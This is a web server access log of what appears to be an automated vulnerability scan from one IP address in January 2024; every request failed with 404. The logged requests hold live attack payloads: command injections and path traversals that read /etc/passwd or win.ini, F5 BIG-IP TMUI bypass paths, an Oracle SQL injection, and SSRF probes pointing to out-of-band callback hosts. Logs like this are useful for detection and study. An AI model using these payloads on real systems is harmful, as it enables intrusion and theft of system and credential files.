137.220.197.141 - - [21/Jan/2024:22:09:52 +0100] "POST /opensis/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:09:54 +0100] "POST /index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:09:59 +0100] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cmm00rc3m87t5g88qsog6qhnt74b334d9.oast.live%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:10:12 +0100] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cmm00rc3m87t5g88qsogzjeme8qkcpfis.oast.live%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:10:59 +0100] "POST /account/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:11:01 +0100] "POST /opensis/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:11:03 +0100] "POST /index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:11:46 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:11:48 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:11:57 +0100] "GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:12:09 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:12:11 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:12:11 +0100] "GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:12:21 +0100] "GET /metrics/v1/mbeans HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:12:35 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:12:37 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:12:51 +0100] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:12:53 +0100] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:12:55 +0100] "GET /magmi/web/info.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:13:01 +0100] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:13:22 +0100] "GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:13:29 +0100] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:13:31 +0100] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:13:33 +0100] "GET /magmi/web/info.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:13:41 +0100] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:14:17 +0100] "GET /metrics/v1/mbeans HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:14:30 +0100] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:14:30 +0100] "GET /metrics/v1/mbeans HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:14:41 +0100] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:14:53 +0100] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:15:07 +0100] "GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:15:18 +0100] "GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:15:27 +0100] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:15:32 +0100] "GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:15:37 +0100] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:15:51 +0100] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:18:03 +0100] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:18:54 +0100] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:19:16 +0100] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:19:16 +0100] "GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:19:24 +0100] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:19:36 +0100] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:19:37 +0100] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:20:04 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:20:06 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:20:12 +0100] "GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:20:34 +0100] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:20:37 +0100] "GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:21:00 +0100] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:21:09 +0100] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:21:19 +0100] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:21:19 +0100] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:21:31 +0100] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:21:34 +0100] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:21:45 +0100] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:22:01 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:22:03 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:22:37 +0100] "POST /account/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:22:39 +0100] "POST /opensis/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:22:41 +0100] "POST /index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:22:51 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:22:53 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:23:15 +0100] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:25:12 +0100] "GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:25:17 +0100] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:25:21 +0100] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:25:28 +0100] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:25:29 +0100] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:25:37 +0100] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:26:19 +0100] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:26:25 +0100] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:26:45 +0100] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:26:52 +0100] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:27:33 +0100] "GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:27:48 +0100] "GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:28:00 +0100] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:28:15 +0100] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:28:34 +0100] "POST /account/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:28:36 +0100] "POST /opensis/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:28:38 +0100] "POST /index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:29:13 +0100] "POST /account/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:29:15 +0100] "POST /opensis/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:29:17 +0100] "POST /index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:29:38 +0100] "GET /css/eonweb.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:30:08 +0100] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:31:06 +0100] "GET /css/eonweb.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:31:17 +0100] "GET /css/eonweb.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:31:30 +0100] "GET /css/eonweb.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:31:32 +0100] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:31:35 +0100] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:31:59 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:32:01 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:32:14 +0100] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:32:29 +0100] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:32:47 +0100] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:32:55 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:32:57 +0100] "GET /wp-admin/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:33:58 +0100] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:34:01 +0100] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:34:13 +0100] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:34:17 +0100] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:34:35 +0100] "GET /css/eonweb.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:35:05 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:35:07 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:35:09 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:35:11 +0100] "GET /hsqldb%0a HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:35:13 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:35:15 +0100] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:35:17 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:35:19 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:35:25 +0100] "GET /css/eonweb.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:35:49 +0100] "GET /css/eonweb.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:35:53 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:35:55 +0100] "GET /wp-admin/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:36:11 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:36:13 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:36:15 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:36:17 +0100] "GET /wp-admin/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:36:40 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:36:42 +0100] "GET /wp-admin/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:36:48 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:36:50 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:37:17 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:37:17 +0100] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:37:19 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:37:32 +0100] "GET /graph_realtime.php?action=init HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:38:31 +0100] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:39:01 +0100] "GET /graph_realtime.php?action=init HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:39:04 +0100] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:39:11 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:39:12 +0100] "GET /graph_realtime.php?action=init HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:39:12 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:39:24 +0100] "GET /graph_realtime.php?action=init HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:39:32 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:39:34 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:39:46 +0100] "GET /css/eonweb.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:39:57 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:39:59 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:41:52 +0100] "GET /css/eonweb.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:42:05 +0100] "GET /css/eonweb.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:42:29 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:42:31 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:42:33 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:42:35 +0100] "GET /hsqldb%0a HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:42:37 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:42:39 +0100] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:42:41 +0100] "GET /graph_realtime.php?action=init HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:42:41 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:42:43 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:43:06 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:43:08 +0100] "GET /wp-admin/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:43:34 +0100] "GET /graph_realtime.php?action=init HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:43:58 +0100] "GET /graph_realtime.php?action=init HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:44:18 +0100] "GET /XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:44:44 +0100] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:44:51 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:44:53 +0100] "GET /wp-admin/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:45:39 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:45:41 +0100] "GET /wp-admin/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:45:52 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:45:54 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:45:56 +0100] "GET /XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:45:56 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:45:58 +0100] "GET /hsqldb%0a HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:46:00 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:46:02 +0100] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:46:04 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:46:06 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:46:06 +0100] "GET /XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:46:20 +0100] "GET /XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:46:38 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:46:40 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:47:54 +0100] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:48:07 +0100] "GET /graph_realtime.php?action=init HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:48:15 +0100] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:48:27 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:48:29 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:49:16 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:49:18 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:49:54 +0100] "GET /XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:50:19 +0100] "GET /graph_realtime.php?action=init HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:50:32 +0100] "GET /graph_realtime.php?action=init HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:50:50 +0100] "GET /XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:50:52 +0100] "GET /version.web HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:51:14 +0100] "GET /XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:51:49 +0100] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:52:24 +0100] "GET /version.web HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:52:35 +0100] "GET /version.web HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:52:47 +0100] "GET /version.web HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:53:39 +0100] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:53:51 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:53:51 +0100] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:53:53 +0100] "GET /wp-admin/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:54:05 +0100] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:55:36 +0100] "GET /XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri HTTP/1.1" 404 952
87.236.176.105 - - [21/Jan/2024:22:56:05 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:56:06 +0100] "GET /version.web HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:56:59 +0100] "GET /version.web HTTP/1.1" 404 952
164.52.36.219 - - [21/Jan/2024:22:57:11 +0100] "GET / HTTP/1.1" 404 952
164.52.36.219 - - [21/Jan/2024:22:57:14 +0100] "GET / HTTP/1.1" 404 952
164.52.36.219 - - [21/Jan/2024:22:57:18 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:57:22 +0100] "GET /version.web HTTP/1.1" 404 952
164.52.36.219 - - [21/Jan/2024:22:57:25 +0100] "GET /favicon.ico HTTP/1.1" 404 952
164.52.36.219 - - [21/Jan/2024:22:57:29 +0100] "GET /favicon.ico HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:57:41 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:57:43 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:57:51 +0100] "GET /XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:58:04 +0100] "GET /XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:58:10 +0100] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:58:12 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:58:14 +0100] "GET /wp-admin/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:58:39 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:58:41 +0100] "GET /wp-admin/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:59:13 +0100] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:59:39 +0100] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:00:35 +0100] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:00:37 +0100] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:01:25 +0100] "GET /version.web HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:02:05 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:02:07 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:02:31 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:02:33 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:02:53 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:03:34 +0100] "GET /version.web HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:03:46 +0100] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:03:47 +0100] "GET /version.web HTTP/1.1" 404 952
